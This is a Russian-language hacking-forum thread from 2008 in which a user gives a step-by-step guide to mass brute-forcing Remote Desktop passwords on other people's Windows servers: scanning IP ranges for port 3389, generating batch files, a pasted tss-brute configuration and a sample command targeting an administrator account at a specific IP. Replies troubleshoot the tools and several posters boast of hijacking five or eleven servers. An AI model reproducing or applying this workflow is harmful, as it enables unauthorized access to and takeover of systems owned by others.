Брут дедиков [by Capcha]

[Capcha]

Расскажу вам как брутить дедики моим старым способом.

ЧТО НУЖНО??

1. Нам нужен VNC_Byauth сканер (В аттаче).
2. Нужен tss-brute (В аттаче).
3. Нужен мой скрипт на PHP для генерации BAT файлов (Смотрим в аттаче).
4. Прога от RankroR'a для выдирания гудов ,которую он делал спец. для меня качаем (В аттаче).
6. RDP 5.1 (В аттаче).
6. Как всегда руки.
7. Мозг тоже пригодится.

Начнём!!

1. Открываем cmd.exe (WIN+R), запускаем VNC_Byauth c параметрами -i xxx.xxx.xxx.xxx-yyy.yyy.yyy.yyy -p 3389 -cT -T Кол-во потоков

2. После того как сканер просканил смотрим его лог в блокноте , удаляем из списка :3389 порт оставив просто список IP адресов.

3. Ставим мой скрипт на хост или на localhost и вставляем туда наши айпишнеги и другие данные.

4. После того как скрипт выполнил своё дело создаём в папке с нашим tss-brute.exe , BAT файл и вставляем в него результат полученый после выполнения скрипта.

5. Заходим в файл smclient.ini который шол вместе с tss-brute.exe и вставляем туда мой конфиг

Код:

[dlls]
tshare=tclient.dll
;check=tclient.dll
;rs232=rs232kbd.dll
[tclient]
;timeout=120
;contimeout=20
StartRun=ShutDown...
StartRunAct=r
RunBox=Typethenameofaprogram
WinLogon=Options<<
;WinLogonAct=\x\&u\&
WinLogonAct=\&u\&
PriorWinLogon=Options>>
PriorWinLogonAct=\&o\&
NTSecurity=ShutDownWindows
NTSecurityAct=\p\p\p\p\p\l
SureLogoff=Logoff
SureLogoffAct=\n
StartLogoff=\p\p\p\p\p\72\*72\n
LogonErrorMessage=LogonMessage
LogonDisabled=Remoteloginsarecurrentlydisabled
LowSpeed=0
PersistentCache=1
;FullScreen=1
;UIClientCaption=Terminal Server Client
;UIDisconnectDialogBox=Terminal Services Client Disconnected
;UIYesNoDisconnect=Disconnect Windows session
ClientImage=mstsc.exe
[clx]
verbose=1
;GlyphEnable=1

и сохраняем.

6. Создаём в той же папке где лежит наш BAT фаил папку которую вы вписывали в скрипте(ОБЯЗАТЕЛЬНО!!!!)

7. После выполнения Брута заходим в нашу папку(см п.6) и вставляем в него программу от Rankor'а. Создаём папку output и вней output.txt

8. Вписываем в программе success , если хоть один дед сбручен программа вам покажет это, если что-то сбрутилось то смотри output.txt там вы увидите IP адресс деда и пароль.

9. Заходим в MSTSC (тобиш RDP) и проверяем наши деды ;)

10. Фсё на этом я закончил если что-то не ясно задаём вопросы тут ))

Для тех у кого не работает брут:

1. Если у вас после запуска бат файла не появляется окно РДП клиента, а запрос на ввод пароля и логина, то скачайте 5версию MSTSC и установите её в безопасном режиме.

2. Если у вас загружается окно РДП клиента, но не происходит подбор паролей, попробуйте отключить брэндмауэр. Иногда брут не может выполнять свои действия если язык на дедике не Англиский.

3. Если не происходит подбор паролей, то поменяйте в панели управления язык по умолчанию на Англиский.

3. Если у вас не работает мой скрипт (если выводит лишние слэши) , это значит что вы не залили .htaccess который идёт вместе с моим скриптом, если так и не получилось запустить, то воспользуйтесь ссылкой которая ниже на полностью работающий сайт с моим скриптом.

Спецально для тех кому не хочется парить мозг с моим скриптом RankoR написал программу для генерирования батников, качаем тут http://forum.asechka.ru/showpost.php...&postcount=270

ТЕМА ОБНОВЛЕНА, ФАЙЛЫ ЗАЛИТЫ В АТТАЧ

!!!!Т.К. МНОГИЕ НЕ ЗНАЮТ ЧТО ТАКОЕ ПХП И КАК ЕГО КУШАТЬ, РАНКОР НАПИСАЛ ПРОГУ СПЕЦ
КАЧАЕМ ЕПТА!!!!

VIDEO F.A.Q

Конечно же отдельное спасибо metal'у за его софтину (tss-brute)
(c) Capcha [07.08.2008] Special For Asechka.ru

Копирования статьи только с разрешения автора.

[Capcha]

RankoR, Да, у себя на компе.

mZHel, Давай по нормальному поговорим, напиши мне в аську, там всё обсудим, зачем это всё выводить на всеобщий кругозор?
Тем более это форум а не чат... Пиши, жду.

[RankoR]

поменял язык, теперь он брутит, но во-первых на 1 пасс уходит секунд 15 а во-вторых несмотря на наличие валидного пасса в листе он его не угадал

Добавлено через 1 минуту
а другие брутит.. странно как-то

[l.sEw.l]

Могу написать програмку на C#, которая напроч откинет использование пхп, а потому и хоста, за ненадобностью... Capcha, респект, но парс твой можно на си(++/#) за 5 минут написать и не морочить голову с хостом, если будет время, реализую.

[Capcha]

l.sEw.l, Я связан только с PHP , на Си шарпе или ++ не умею писать.

[RankoR]

Цитата:

Сообщение от l.sEw.l

на си(++/#)

нахрена тут ООП? ща йа на делфи уже дописываю

[q1p]

прошу прощения, что вмешиваюсь, но не мог не ответить, TSGrinder умеет подбирать пароли только к серверам с английской локализацией интерфейса и только версии от NT до 2003, ибо Vista и Server 2008 имеют совсем другую стуктуру окна логина, о которой при написании TSGrinder'а ещё никто и не ведал
(это ответ на те посты, где затрагивалась тема якобы "простоя" и "медленного подбора", в таком случае в реальности подбор происходит но совсем не так как надо)

[RankoR]

вот, если кому надо, генератор с Гуем
иконку поменять не могу, т.к. делфи7 глюкнула
Объяснять как им пользоваццо, я думаю не надо)

[NemeZz]

))) Нафига этот софт?)) Всё сижу и никак в голову не приходит. Гуды отлично ищутся обычным Поиском по слову. Для брута по списку ипов и для скана по списку диапазонов отлично можно использовать батнеги. И тока так...

[...vamp]

C:\Documents and Settings\xxx\tss-brute.exe -w C:\Documents and Settings\xxx
\pass.txt -u administrator 195.73.134.171 >>Log/195.73.134.171 .txt


RankoR, я хз но поему чет нето=)

[RankoR]

Цитата:

Сообщение от NemeZz

Для брута по списку ипов и для скана по списку диапазонов отлично можно использовать батнеги. И тока так...

а мы как делаем? О_о

Добавлено через 1 минуту
...vamp, хз, вот тока что сгенерировал батнег, кинул на дед - все нормально брутит, файлы создает
то что 1 пробел в конце имени - какбы ниче страшного

[...vamp]

Цитата:

Сообщение от RankoR

...vamp, хз, вот тока что сгенерировал батнег, кинул на дед - все нормально брутит, файлы создает
то что 1 пробел в конце имени - какбы ниче страшного

это понятно

Цитата:

Сообщение от ...vamp

C:\Documents and Settings\xxx\tss-brute.exe -w C:\Documents and Settings\xxx

а вот это шозанах?почему w стоит посреди адреса?

[Capcha]

Цитата:

Сообщение от ...vamp

C:\Documents and Settings\xxx\tss-brute.exe -w C:\Documents and Settings\xxx

Ты айпишнеги не вписал, или ранкор что-то не то намутил, пропущен параметр -i xxx.xxx.xxx.xxx-yyy.yyy.yyy.yyy

[...vamp]

Capcha, так все вписано=)и он говорит что работает

[RankoR]

Цитата:

tss-brute.exe -w pass.txt 207.7.218.45 >> a.txt

все правильно
капча, при чем тут -i ? O_o

Добавлено через 1 минуту

Цитата:

Сообщение от ...vamp

почему w стоит посреди адреса?

не совсем тя понял..

[...vamp]

RankoR, смотри что он пишет C:\Documents and Settings\xxx\tss-brute.exe -w C:\Documents and Settings\xxx\pass.txt -u administrator 195.73.134.171 >>195.73.134.171.txt/195.73.134.171 .txt

Добавлено через 31 секунду

Цитата:

Сообщение от ...vamp

tss-brute.exe -w C:\Documents and Setting

это не правильно

[Andrew777]

Наконец сбрутил более менее нормального деда. Как мона его обезопасить от повторного взлома, а то с ламерским пассом както сыкатно.

[.benjaz]

Цитата:

Сообщение от Andrew777

Наконец сбрутил более менее нормального деда. Как мона его обезопасить от повторного взлома, а то с ламерским пассом както сыкатно.

никак

а я за сегодня 5дедов сбрутил тока)

[EastoN]

Capcha, спасибо за статью

RankoR, спасибо за проги(спасибку ставить не могу, постов мало)
За сегоня снял 11 дедоф с 2к или 2к3, пару штук хр я не считаю.
Способ работает=)

[EastoN]

Capcha, вопросик: если например в списке ип для брута попался дедик, который не пингуецца или вылазит какая-либо ошибка, то почему брут не продолжает работать, пока не закроешь руками эту ошибку? Это можно как-то исправить? Просто ооочень неудобно, когда оставляешь брут на дедике и куда-то уходишь, а когда приходишь, то видишь, что пробрутилось не половина сорса, а 10 дедоф. На одиннадцатом брут застопорился из-за ошибки и всё...

[q1p]

easton, TSGrinder на это не расчитан, изначально он предназначался для брута одного сервера, а батники это уже идея народных умельцев

[EastoN]

q1p, может можно написать какую-то утилитку, которая сидела бы в памяти компа/дедика и завершала процесс с опр. названием?

[q1p]

easton, можно, но в данном случае это не будет корректным решением этой проблемы

[EastoN]

q1p, почему? Ведь те ошибки, которые вылазят, они же как-то называюцца в процессах) Почему незя их завершать?

[q1p]

easton, процесс один и тот же всегда, это mstsc.exe, если его завершать по таймеру то это может произойти во время работы
с другой стороны, можно просто закрывать эти сообщения об ошибках, стукни завтра в ацку, если по времени завтра получится, то будет тебе такая программулька

[Capcha]

easton, Описывалось выше, что это делается с помощью timeout глянь посты выше.